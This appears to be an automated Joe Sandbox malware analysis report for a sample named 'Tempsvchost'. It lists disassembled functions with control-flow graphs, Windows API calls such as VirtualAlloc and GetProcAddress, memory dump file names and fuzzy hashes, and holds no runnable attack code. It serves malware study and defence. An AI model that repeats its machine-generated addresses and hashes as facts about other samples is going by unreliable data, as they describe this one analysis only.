                                                                                                                                                                                      control_flow_graph 562 401340-401359 GetModuleHandleA 563 401410-40141f 562->563 564 40135f-40139d LoadLibraryA GetProcAddress * 2 562->564 565 4013a2-4013a4 563->565 564->565 566 4013a6-4013ae 565->566 567 4013b7-4013be 565->567 566->567 568 4013c0-4013d6 GetModuleHandleA 567->568 569 4013fa-40140c atexit 567->569 570 4013d8-4013eb GetProcAddress 568->570 571 4013ed-4013ef 568->571 570->571 571->569 572 4013f1 571->572 572->569
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$HandleModule$LibraryLoadatexit
                                                                                                                                                                                      • String ID: AB$_Jv_RegisterClasses$__deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-16.dll
                                                                                                                                                                                      • API String ID: 2016387483-3485274408
                                                                                                                                                                                      • Opcode ID: 2177a26753abd782db7d760b352188be710b4f79fda87523ca9645ee2a39d7a2
                                                                                                                                                                                      • Instruction ID: 54071837301fb4b187bfc7fc3512930c214f65c3f6faa9ac1359fa9e402d4777
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2177a26753abd782db7d760b352188be710b4f79fda87523ca9645ee2a39d7a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19114FB1A047209AD7107F79A90922F7FF4BB40348FC1853EDC8467655E7788858CB9B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041F440 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 257stringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 573 41f440-41f450 574 41f740-41f74c call 4012a0 573->574 575 41f456-41f4a9 GetCommandLineA strlen call 41ffc0 573->575 580 41f4b0-41f4bb 575->580 581 41f530-41f532 580->581 582 41f4bd-41f4c0 580->582 583 41f7d1 581->583 584 41f538-41f53a 581->584 585 41f653-41f658 582->585 586 41f4c6 582->586 592 41f7d8 583->592 587 41f540-41f549 584->587 590 41f7ac-41f7bc 585->590 591 41f65e-41f66e 585->591 588 41f580-41f583 586->588 589 41f4cc-41f4cf 586->589 587->587 593 41f54b-41f54e 587->593 594 41f673-41f677 588->594 595 41f589-41f58c 588->595 596 41f685-41f68c 589->596 597 41f4d5-41f4d8 589->597 605 41f7c3 590->605 598 41f5b0-41f5b9 591->598 601 41f712-41f736 call 428750 593->601 602 41f554-41f559 593->602 607 41f761-41f767 594->607 608 41f67d-41f680 594->608 595->585 603 41f592-41f595 595->603 599 41f5f0-41f5f5 596->599 600 41f692-41f696 596->600 597->585 604 41f4de-41f4e1 597->604 606 41f5c0-41f5c9 598->606 599->605 610 41f5fb-41f5fc 599->610 600->592 609 41f69c-41f69e 600->609 601->574 602->601 611 41f55f-41f579 602->611 603->599 612 41f597-41f59e 603->612 604->599 613 41f4e7-41f4eb 604->613 622 41f7ca 605->622 606->606 615 41f5cb-41f5cd 606->615 607->580 608->580 618 41f6a0-41f6a9 609->618 619 41f600-41f609 610->619 612->585 620 41f5a4-41f5ae 612->620 621 41f4f1 613->621 613->622 616 41f5e0 615->616 617 41f5cf-41f5d6 615->617 624 41f5e2-41f5e8 616->624 617->580 618->618 625 41f6ab-41f6af 618->625 619->619 626 41f60b-41f610 619->626 620->598 620->624 627 41f4f3-41f4fc 621->627 622->583 624->617 628 41f6b5-41f6b7 625->628 629 41f74d-41f75c 625->629 630 41f612-41f61a 626->630 631 41f647-41f64e 626->631 627->627 632 41f4fe-41f502 627->632 628->629 633 41f6bd-41f6cc 628->633 629->580 634 41f620-41f635 _isctype 630->634 635 41f6e5-41f6f0 630->635 631->580 636 41f6d1-41f6e0 632->636 637 41f508-41f50a 632->637 633->580 639 41f6f6-41f6f9 634->639 640 41f63b 634->640 635->639 641 41f63e-41f641 635->641 636->580 637->636 638 41f510-41f52a 637->638 638->582 642 41f52c 638->642 643 41f770-41f78f call 428750 639->643 644 41f6fb-41f700 639->644 640->641 641->631 641->639 642->581 647 41f794-41f7a7 643->647 644->643 646 41f702-41f70d 644->646 646->580 647->580
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CommandLinestrlen
                                                                                                                                                                                      • String ID: "$'$'$*$?$@$[$\
                                                                                                                                                                                      • API String ID: 3702654222-871974141
                                                                                                                                                                                      • Opcode ID: 9b4e8a8688bcef519ccce25f28d00a772931677515de214d4d10af52da977039
                                                                                                                                                                                      • Instruction ID: 3b54d8bf7565d62b8771bd002527bd2635b7225816f2cd1adaa5ae607b4f4ae9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b4e8a8688bcef519ccce25f28d00a772931677515de214d4d10af52da977039
                                                                                                                                                                                      • Instruction Fuzzy Hash: 01A1CF71A142059FDB14CF68C8447EFB7E2AB54308F18853BD809E7352E73DA88B8B59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004066D5 Relevance: 9.8, APIs: 3, Strings: 1, Instructions: 3810memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 789 4066d5-4066f8 call 401523 792 406721-406d79 789->792 793 4066fa-40671e VirtualAlloc 789->793 794 406d8a-406e12 792->794 795 406d7b-406d87 792->795 793->792 796 406e14-406e1c 794->796 797 406e1f-406f2c 794->797 795->794 796->797 798 406f3c-406fc6 797->798 799 406f2e-406f3a 797->799 800 406fd4-407016 798->800 801 406fc8-406fce 798->801 799->798 802 407027-407042 800->802 803 407018-407024 800->803 801->800 804 407050-4075b7 802->804 805 407044-40704a 802->805 803->802 806 408565-408574 804->806 807 4075bd-407c1e 804->807 805->804 810 408576-40859a VirtualAlloc 806->810 811 40859d-408c00 806->811 808 407c20-407c26 807->808 809 407c2c-407c93 807->809 808->809 814 407ca4-407e17 809->814 815 407c95-407ca1 809->815 810->811 812 408c02-408c0a 811->812 813 408c0d-408c57 811->813 812->813 816 408c62-408c9a 813->816 817 408c59-408c5f 813->817 818 407e26-407e48 814->818 819 407e19-407e1f 814->819 815->814 820 408cab-408d29 816->820 821 408c9c-408ca5 816->821 817->816 822 407e56-407e7e 818->822 823 407e4a-407e50 818->823 819->818 826 408d45-408d6f 820->826 827 408d2b-408d3f 820->827 821->820 824 407e80-407e89 822->824 825 407e8f-407ef6 822->825 823->822 824->825 828 407ef8-407f04 825->828 829 407f0a-407f7a 825->829 830 408d71-408d77 826->830 831 408d7d-408d95 826->831 827->826 828->829 832 407f88-407fa0 829->832 833 407f7c-407f82 829->833 830->831 834 408da6-408dd7 831->834 835 408d97-408da0 831->835 836 407fb1-407fbd 832->836 837 407fa2-407fab 832->837 833->832 838 408dd9-408de5 834->838 839 408deb-408e7e 834->839 835->834 840 407fce-407fe6 836->840 841 407fbf-407fc8 836->841 837->836 838->839 842 408e80-408e86 839->842 843 408e8c-408eaa 839->843 846 407fe8-407ff4 840->846 847 407ffa-40802e 840->847 841->840 842->843 844 408ebc-408ee2 843->844 845 408eac-408eb6 843->845 848 408ef4-408f1c 844->848 849 408ee4-408ef1 844->849 845->844 846->847 850 408030-408035 847->850 851 40803b-40855f 847->851 852 408f31-408f66 848->852 853 408f1e-408f2b 848->853 849->848 850->851 851->806 854 408f77-408fa4 852->854 855 408f68-408f74 852->855 853->852 856 408fb5-408fd1 854->856 857 408fa6-408faf 854->857 855->854 858 408fe2-408fee 856->858 859 408fd3-408fdc 856->859 857->856 860 408ff0-408ffc 858->860 861 409002-409056 858->861 859->858 860->861 862 409058-409064 861->862 863 40906a-409098 861->863 862->863 864 4090a9-4090af 863->864 865 40909a-4090a3 863->865 866 4090b1-4090b9 864->866 867 4090bf-4090fb 864->867 865->864 866->867 868 40910c-40916d 867->868 869 4090fd-409109 867->869 870 40917e-409246 868->870 871 40916f-409178 868->871 869->868 872 409254-40926d 870->872 873 409248-40924e 870->873 871->870 874 40927e-4092c6 872->874 875 40926f-40927b 872->875 873->872 876 4092d1-4092ea 874->876 877 4092c8-4092cb 874->877 875->874 878 4092f8-409301 876->878 879 4092ec-4092f5 876->879 877->876 880 409312-409357 878->880 881 409303-40930c 878->881 879->878 882 409368-4098af 880->882 883 409359-409362 880->883 881->880 884 4098b1-4098d5 VirtualAlloc 882->884 885 4098d8-409f8a 882->885 883->882 884->885 886 409f8c-409f98 885->886 887 409f9e-40a083 885->887 886->887 888 40a091-40a0b4 887->888 889 40a085-40a08b 887->889 890 40a0c2-40a64b 888->890 891 40a0b6-40a0bc 888->891 889->888 892 40a651-40ac71 890->892 893 40b678-40b682 890->893 891->890 894 40ac73-40ac7f 892->894 895 40ac85-40acf2 892->895 894->895 896 40ad00-40ad35 895->896 897 40acf4-40acfa 895->897 898 40ad37-40ad43 896->898 899 40ad49-40addf 896->899 897->896 898->899 900 40ade1-40ade7 899->900 901 40adea-40ae08 899->901 900->901 902 40ae1a-40ae60 901->902 903 40ae0a-40ae14 901->903 904 40ae70-40af60 902->904 905 40ae62-40ae6a 902->905 903->902 906 40af62-40af68 904->906 907 40af6e-40afe5 904->907 905->904 906->907 908 40afe7-40aff3 907->908 909 40aff9-40b024 907->909 908->909 910 40b032-40b073 909->910 911 40b026-40b02c 909->911 912 40b080-40b117 910->912 913 40b075-40b07a 910->913 911->910 914 40b128-40b675 912->914 915 40b119-40b122 912->915 913->912 914->893 915->914
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00401523: VirtualAlloc.KERNEL32 ref: 00401565
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00406719
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00408595
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 004098D0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                      • API String ID: 4275171209-3993045852
                                                                                                                                                                                      • Opcode ID: 3606e57e4523434e56b88f1ab275e9dd702bb815cc612b4bebc025dce97ef2e5
                                                                                                                                                                                      • Instruction ID: d527ec71ce64083c4df4d66c983cec8e8246e070fc5ef22d400c77efc37e8aa6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3606e57e4523434e56b88f1ab275e9dd702bb815cc612b4bebc025dce97ef2e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BC32A76C01229CFCB25CF58CD85BD9B7B4BF54308F0981EAC949AB216D730AA99CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041031B Relevance: 9.6, APIs: 3, Strings: 1, Instructions: 3606memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 916 41031b-41033c call 40b683 919 410365-41096c 916->919 920 41033e-410362 VirtualAlloc 916->920 921 41097a-410a75 919->921 922 41096e-410974 919->922 920->919 923 410a85-410b22 921->923 924 410a77-410a7f 921->924 922->921 925 410b24 923->925 926 410b2a-410b87 923->926 924->923 925->926 927 410b95-410cd0 926->927 928 410b89-410b8f 926->928 929 410cd2-410cd8 927->929 930 410cde-410d03 927->930 928->927 929->930 931 410d05-410d0e 930->931 932 410d14-410d4e 930->932 931->932 933 410d50-410d56 932->933 934 410d5c-410d7b 932->934 933->934 935 410d7d-410d86 934->935 936 410d8c-4112c7 934->936 935->936 937 41208a-41209b 936->937 938 4112cd-411ab6 936->938 941 4120c4-4126c6 937->941 942 41209d-4120c1 VirtualAlloc 937->942 939 411ac3-411ae5 938->939 940 411ab8-411abd 938->940 943 411af2-411b61 939->943 944 411ae7-411aec 939->944 940->939 945 4126c8 941->945 946 4126ce-4127d2 941->946 942->941 949 411b63-411b68 943->949 950 411b6e-411b83 943->950 944->943 945->946 947 4127d4-4127da 946->947 948 4127dd-41283a 946->948 947->948 951 412845-412880 948->951 952 41283c-412842 948->952 949->950 953 411b85-411b91 950->953 954 411b97-412087 950->954 955 412891-4128a3 951->955 956 412882-41288b 951->956 952->951 953->954 954->937 957 4128a5-4128ae 955->957 958 4128b4-412902 955->958 956->955 957->958 959 412910-412a21 958->959 960 412904-41290a 958->960 961 412a23-412a29 959->961 962 412a2f-412b28 959->962 960->959 961->962 963 412b36-412b52 962->963 964 412b2a-412b30 962->964 965 412b63-412bb4 963->965 966 412b54-412b5d 963->966 964->963 967 412bc2-412bf8 965->967 968 412bb6-412bbc 965->968 966->965 969 412c06-412c47 967->969 970 412bfa-412c00 967->970 968->967 971 412c49-412c55 969->971 972 412c5b-412c70 969->972 970->969 971->972 973 412c72-412c7e 972->973 974 412c84-4131d4 972->974 973->974 975 4131d6-4131fa VirtualAlloc 974->975 976 4131fd-413826 974->976 975->976 977 413828-413835 976->977 978 41383b-4138bf 976->978 977->978 979 4138c1-4138c9 978->979 980 4138cf-4138e7 978->980 979->980 981 4138f5-41393f 980->981 982 4138e9-4138ef 980->982 983 413941-413947 981->983 984 41394d-413966 981->984 982->981 983->984 985 413974-413989 984->985 986 413968-413971 984->986 987 41398b-413997 985->987 988 41399d-4139c4 985->988 986->985 987->988 989 4139c6-4139d2 988->989 990 4139d8-4139f0 988->990 989->990 991 4139f2-4139fe 990->991 992 413a04-413a64 990->992 991->992 993 413a75-413b0d 992->993 994 413a66-413a6f 992->994 995 413b18-413bea 993->995 996 413b0f-413b15 993->996 994->993 997 413bec-413bf8 995->997 998 413bfe-413c36 995->998 996->995 997->998 999 413c44-41418d 998->999 1000 413c38-413c3e 998->1000 1001 414193-41487e 999->1001 1002 414e76-414e80 999->1002 1000->999 1003 414880-414886 1001->1003 1004 41488c-414941 1001->1004 1003->1004 1005 414943-41494c 1004->1005 1006 414952-41495e 1004->1006 1005->1006 1007 414960 1006->1007 1008 414966-414e73 1006->1008 1007->1008 1008->1002
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: a
                                                                                                                                                                                      • API String ID: 4275171209-3904355907
                                                                                                                                                                                      • Opcode ID: 33f84bd620475867c2a06b40dbc9b457ccb44ba5283b12e624c41f52991f0f13
                                                                                                                                                                                      • Instruction ID: eee650d2e6e8bae1514951fbdac6958061453b0e3bca87846b0badb3aab5ef53
                                                                                                                                                                                      • Opcode Fuzzy Hash: 33f84bd620475867c2a06b40dbc9b457ccb44ba5283b12e624c41f52991f0f13
                                                                                                                                                                                      • Instruction Fuzzy Hash: 39B33B76C01229CFCB25CF58CD85BC9B7B5BF44308F1885EAC959AB206D730AA99CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00401523 Relevance: 8.9, APIs: 4, Instructions: 3913memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004014EF: VirtualAlloc.KERNEL32 ref: 00401514
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00401565
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00403403
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00404609
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00405685
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                      • Opcode ID: f4e8e47899eb4c6868787a73864b049162b835b795be8997807acf0e16138fef
                                                                                                                                                                                      • Instruction ID: 78915d008035de0124b7902ccfe060fe4be08b3a0f31f0347330c3d697a184b1
                                                                                                                                                                                      • Opcode Fuzzy Hash: f4e8e47899eb4c6868787a73864b049162b835b795be8997807acf0e16138fef
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BC31976C01229CFCB65CF58CD85BC9B7B5BF48308F1841EAC959AB206E730AA95CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0040146E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 61memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1167 40146e-401481 1168 4014e3-401522 call 4a93f0 VirtualAlloc 1167->1168 1169 401483-40149a 1167->1169 1171 4014bb-4014e0 call 49bfe0 1169->1171 1172 40149c-4014b8 call 49da80 1169->1172 1172->1171
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: I$basic_string::_M_construct null not valid
                                                                                                                                                                                      • API String ID: 4275171209-1594006540
                                                                                                                                                                                      • Opcode ID: d64bddece4cf24d0ad847f03f86a17cd3c22187c2437b36896a99107f177015d
                                                                                                                                                                                      • Instruction ID: c6537c7913f881c38bef9576c27a013dfa2cb1a4f9b724fc266a4ba2a46f89c2
                                                                                                                                                                                      • Opcode Fuzzy Hash: d64bddece4cf24d0ad847f03f86a17cd3c22187c2437b36896a99107f177015d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 41117CB49043049FCB00EF69C48466EFBF8EF89754F00856EE9889B395E7789805CB96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004AF3B0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1178 4af3b0-4af3ba 1179 4af3bc 1178->1179 1180 4af3c1-4af3cb malloc 1178->1180 1179->1180 1181 4af3cd-4af3d1 1180->1181 1182 4af3d2-4af3d9 call 4a89e0 1180->1182 1185 4af3db-4af3dd 1182->1185 1186 4af3df-4af41b call 4af4d0 call 4afb80 1182->1186 1185->1180 1192 4af41d 1186->1192 1193 4af422-4af42e malloc 1186->1193 1192->1193 1194 4af440-4af447 call 4a89e0 1193->1194 1195 4af430-4af437 1193->1195 1194->1195 1198 4af449-4af44b 1194->1198 1198->1193
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                      • String ID: lJ
                                                                                                                                                                                      • API String ID: 2803490479-3144685753
                                                                                                                                                                                      • Opcode ID: a7d144888a339beb0e5e7a21acbbb2249903ab6ad1932a99d6ac4b507a04452d
                                                                                                                                                                                      • Instruction ID: 6247525e69a317f9e55ba8f7db918dce9cf5607edd55eacfede4b18dc16812dc
                                                                                                                                                                                      • Opcode Fuzzy Hash: a7d144888a339beb0e5e7a21acbbb2249903ab6ad1932a99d6ac4b507a04452d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B0148B06043015BDB107FA6598122B7D94AF7638CF41487EDDC497342EB7DC858876A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00429030 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,?,?,004284BB), ref: 00429045
                                                                                                                                                                                      • free.MSVCRT(?,?,?,?,?,?,004284BB), ref: 00429054
                                                                                                                                                                                      • _errno.MSVCRT ref: 00429060
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseFind_errnofree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1660445202-0
                                                                                                                                                                                      • Opcode ID: 441ba031dc975d3c37c690e2cc3b60cbc3454b32681044380269ab40b0034261
                                                                                                                                                                                      • Instruction ID: 389e10537d83ffb0a76245e52feb33858f3f6d1ffdf1db30ccca3515b67abba4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 441ba031dc975d3c37c690e2cc3b60cbc3454b32681044380269ab40b0034261
                                                                                                                                                                                      • Instruction Fuzzy Hash: 98E04FB07003588BD7007E76A88162B36A86B01714FD00A7EEC509B283E73DD8548766
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004012E0 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
